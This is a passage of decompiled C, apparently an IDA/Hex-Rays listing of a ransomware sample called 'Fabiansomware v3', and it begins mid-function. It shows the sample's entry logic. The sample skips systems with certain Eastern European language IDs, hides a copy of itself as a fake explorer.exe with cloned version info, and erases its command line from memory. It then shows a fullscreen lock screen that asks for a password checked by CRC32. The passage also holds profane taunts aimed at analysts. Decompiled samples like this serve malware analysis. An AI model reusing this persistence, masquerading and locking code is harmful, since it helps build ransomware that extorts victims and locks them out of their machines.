  int v5; // eax
  WCHAR String[256]; // [esp+8h] [ebp-604h] BYREF
  WCHAR CommandLine[514]; // [esp+208h] [ebp-404h] BYREF

  if ( Msg == 2 )
  {
    PostQuitMessage(0);
    return 0;
  }
  if ( Msg != 273 )
    return DefWindowProcW(hWnd, Msg, wParam, lParam);
  if ( HIWORD(wParam) )
    return 0;
  GetWindowTextW(::hWnd, String, 255);
  if ( !dword_405680 )
  {
    if ( lstrlenW(String) )
    {
      wsprintfW(CommandLine, L"\"%s\" %s", &pszFirst, String);
      sub_401990(ApplicationName, CommandLine, 0);
      ExitProcess(0);
    }
    return 0;
  }
  if ( !lstrlenW(String) )
    return 0;
  v5 = lstrlenW(String);
  if ( dword_405460(0, String, 2 * v5) == 664891434 )
  {
    TerminateThread(hThread, 0);
    sub_401A70();
    sub_401B70();
    ExitProcess(0);
  }
  MessageBoxW(0, L"Incorrect Password!", L"Error", 0x10u);
  return 0;
}
// 405460: using guessed type int (__stdcall *dword_405460)(_DWORD, _DWORD, _DWORD);
// 405680: using guessed type int dword_405680;
// 406140: using guessed type WCHAR ApplicationName[512];

//----- (00401D30) --------------------------------------------------------
DWORD __usercall sub_401D30@<eax>(const WCHAR *a1@<eax>)
{
  DWORD result; // eax
  DWORD v3; // edi
  void *v4; // esi
  HANDLE updated; // ebx
  DWORD dwHandle; // [esp+8h] [ebp-8h] BYREF
  unsigned int puLen; // [esp+Ch] [ebp-4h] BYREF

  result = GetFileVersionInfoSizeW(a1, &dwHandle);
  v3 = result;
  if ( result )
  {
    v4 = VirtualAlloc(0, 2 * result, 0x1000u, 4u);
    GetFileVersionInfoW(a1, 0, v3, v4);
    VerQueryValueW(v4, L"\\VarFileInfo\\Translation", &lpBuffer, &puLen);
    updated = BeginUpdateResourceW(ApplicationName, 0);
    UpdateResourceW(updated, (LPCWSTR)0x10, (LPCWSTR)1, *(_WORD *)lpBuffer, v4, v3);
    EndUpdateResourceW(updated, 0);
    VirtualFree(v4, 0, 0x8000u);
    return CloseHandle(updated);
  }
  return result;
}
// 406140: using guessed type WCHAR ApplicationName[512];

//----- (00401DD0) --------------------------------------------------------
WPARAM __stdcall start(HINSTANCE hInstance, int a2, int a3, int a4)
{
  int SystemDefaultLangID; // esi
  HMODULE ModuleHandleW; // eax
  struct _PEB *v6; // edi
  struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters; // eax
  LPCWSTR *v8; // esi
  struct _RTL_USER_PROCESS_PARAMETERS *v9; // eax
  int Length; // ecx
  wchar_t *i; // eax
  struct _RTL_USER_PROCESS_PARAMETERS *v12; // eax
  int v13; // ecx
  wchar_t *j; // eax
  int SystemMetrics; // eax
  HWND v16; // edi
  HINSTANCE WindowLongW; // eax
  HMODULE v18; // eax
  HDC DC; // edi
  HWND Window; // edi
  int v22; // [esp-1Ch] [ebp-284h]
  int X; // [esp+Ch] [ebp-25Ch]
  int DeviceCaps; // [esp+10h] [ebp-258h]
  int nWidth; // [esp+14h] [ebp-254h]
  int pNumArgs; // [esp+18h] [ebp-250h] BYREF
  WNDCLASSEXW v27; // [esp+1Ch] [ebp-24Ch] BYREF
  tagMSG Msg; // [esp+4Ch] [ebp-21Ch] BYREF
  WCHAR Dst[256]; // [esp+68h] [ebp-200h] BYREF

  Sleep(0x7D0u);
  SystemDefaultLangID = GetSystemDefaultLangID();
  OutputDebugStringW(L"Crack me again, motherfucker! Show that you have eggs!");
  OutputDebugStringW(L"Wow xXToffeeXx nice ass ^__^");
  CreateMutexW(0, 0, L"Local\\Fabiansomware");
  if ( GetLastError() == 183
    || SystemDefaultLangID == 1049
    || SystemDefaultLangID == 1058
    || SystemDefaultLangID == 1059 )
  {
    goto LABEL_22;
  }
  ModuleHandleW = GetModuleHandleW(L"ntdll.dll");
  RtlComputeCrc32 = (int (__stdcall *)(_DWORD, _DWORD, _DWORD))GetProcAddress(ModuleHandleW, "RtlComputeCrc32");
  GetModuleFileNameW(0, &pszFirst, 0x200u);
  ExpandEnvironmentStringsW(L"%PROGRAMFILES%\\Windows NT\\explorer.exe", ApplicationName, 0x200u);
  if ( GetFileAttributesW(ApplicationName) == -1 )
  {
    CopyFileW(&pszFirst, ApplicationName, 1);
    sub_4017C0();
    ExpandEnvironmentStringsW(L"%systemroot%\\explorer.exe", Dst, 0xFFu);
    sub_401D30(Dst);
    SetFileAttributesW(ApplicationName, 6u);
    sub_401710();
  }
  else if ( StrStrW(&pszFirst, L"explorer.exe") )
  {
    v6 = NtCurrentPeb();
    ProcessParameters = v6->ProcessParameters;
    dword_405680 = 1;
    if ( ProcessParameters->CommandLine.Length )
    {
      v8 = (LPCWSTR *)CommandLineToArgvW(ProcessParameters->CommandLine.Buffer, &pNumArgs);
      if ( pNumArgs == 2 )
      {
        DeleteFileW(*v8);
        wsprintfW(pbData, v8[1]);
        sub_401A10();
        v9 = v6->ProcessParameters;
        Length = v9->ImagePathName.Length;
        for ( i = v9->ImagePathName.Buffer; Length; --Length )
        {
          *(_BYTE *)i = 0;
          i = (wchar_t *)((char *)i + 1);
        }
        v12 = v6->ProcessParameters;
        v13 = v12->CommandLine.Length;
        for ( j = v12->CommandLine.Buffer; v13; --v13 )
        {
          *(_BYTE *)j = 0;
          j = (wchar_t *)((char *)j + 1);
        }
        CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_4015A0, 0, 0, 0);
      }
    }
  }
  sub_401AD0();
  v27.hInstance = hInstance;
  v27.lpszClassName = L"Fabiansomware v3";
  v27.lpfnWndProc = sub_401BE0;
  v27.style = 8;
  v27.cbSize = 48;
  v27.hIcon = LoadIconW(0, (LPCWSTR)0x7F00);
  v27.hIconSm = LoadIconW(0, (LPCWSTR)0x7F00);
  v27.hCursor = LoadCursorW(0, (LPCWSTR)0x7F00);
  v27.lpszMenuName = 0;
  v27.cbClsExtra = 0;
  v27.cbWndExtra = 0;
  v27.hbrBackground = (HBRUSH)1;
  if ( !RegisterClassExW(&v27) )
LABEL_22:
    ExitProcess(0);
  if ( dword_405680 )
  {
    sub_4016B0();
    DC = GetDC(0);
    nWidth = GetDeviceCaps(DC, 8);
    DeviceCaps = GetDeviceCaps(DC, 10);
    ReleaseDC(0, DC);
    Window = CreateWindowExW(
               0,
               L"Fabiansomware v3",
               &word_403870,
               0x80000000,
               0x80000000,
               0,
               nWidth,
               DeviceCaps,
               0,
               0,
               hInstance,
               0);
    dword_406124 = (int)CreateWindowExW(
                          0,
                          L"static",
                          L"ST_U",
                          0x50010000u,
                          nWidth / 3,
                          DeviceCaps / 15,
                          nWidth / 3,
                          DeviceCaps / 3,
                          Window,
                          (HMENU)0x1F5,
                          hInstance,
                          0);
    SetWindowTextW((HWND)dword_406124, &WideCharStr);
    dword_406124 = (int)CreateWindowExW(
                          0,
                          L"static",
                          L"ST_U",
                          0x50010000u,
                          nWidth / 2 - 35,
                          DeviceCaps / 2 - 80,
                          70,
                          16,
                          Window,
                          (HMENU)0x1F5,
                          hInstance,
                          0);
    SetWindowTextW((HWND)dword_406124, L"Password:");
    X = nWidth / 3 + 177;
    hWnd = CreateWindowExW(
             0x200u,
             L"EDIT",
             &word_403870,
             0x50000000u,
             X,
             DeviceCaps / 3 + 90,
             180,
             23,
             Window,
             (HMENU)0x1F6,
             hInstance,
             0);
    dword_406554 = (int)CreateWindowExW(
                          0,
                          L"BUTTON",
                          L"Unlock",
                          0x50010001u,
                          X,
                          DeviceCaps / 3 + 120,
                          180,
                          23,
                          Window,
                          0,
                          hInstance,
                          0);
    ShowWindow(Window, 3);
    UpdateWindow(Window);
    hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)sub_401820, 0, 0, 0);
  }
  else
  {
    v22 = GetSystemMetrics(1) / 2 - 270;
    SystemMetrics = GetSystemMetrics(0);
    v16 = CreateWindowExW(
            0,
            L"Fabiansomware v3",
            L"Fabiansomware v3",
            0x480000u,
            SystemMetrics / 2 - 160,
            v22,
            269,
            330,
            0,
            0,
            hInstance,
            0);
    WindowLongW = (HINSTANCE)GetWindowLongW(v16, -6);
    dword_406124 = (int)CreateWindowExW(
                          0,
                          L"static",
                          L"ST_U",
                          0x50010000u,
                          0,
                          190,
                          300,
                          210,
                          v16,
                          (HMENU)0x1F5,
                          WindowLongW,
                          0);
    SetWindowTextW((HWND)dword_406124, L"\r\n          Please type encryption key:");
    hWnd = CreateWindowExW(
             0x200u,
             L"EDIT",
             &word_403870,
             0x50000000u,
             40,
             230,
             180,
             23,
             v16,
             (HMENU)0x1F6,
             hInstance,
             0);
    dword_406554 = (int)CreateWindowExW(0, L"BUTTON", L"Continue", 0x50010001u, 40, 260, 180, 23, v16, 0, hInstance, 0);
    dword_405044 = CreateWindowExW(
                     0,
                     L"Static",
                     L"Picture Box",
                     0x5000000Eu,
                     0,
                     0,
                     100,
                     100,
                     v16,
                     (HMENU)0x2711,
                     hInstance,
                     0);
    v18 = GetModuleHandleW(0);
    dword_406558 = (int)LoadBitmapW(v18, (LPCWSTR)0x67);
    SendMessageW(dword_405044, 0x172u, 0, dword_406558);
    ShowWindow(v16, 10);
  }
  while ( GetMessageW(&Msg, 0, 0, 0) )
  {
    TranslateMessage(&Msg);
    DispatchMessageW(&Msg);
  }
  return Msg.wParam;
}
// 405460: using guessed type int (__stdcall *RtlComputeCrc32)(_DWORD, _DWORD, _DWORD);
// 405480: using guessed type WCHAR pbData[256];
// 405680: using guessed type int dword_405680;
// 406124: using guessed type int dword_406124;
// 406140: using guessed type WCHAR ApplicationName[512];
// 406554: using guessed type int dword_406554;
// 406558: using guessed type int dword_406558;

// nfuncs=29 queued=18 decompiled=18 lumina nreq=0 worse=0 better=0
// ALL OK, 18 function(s) have been successfully decompiled
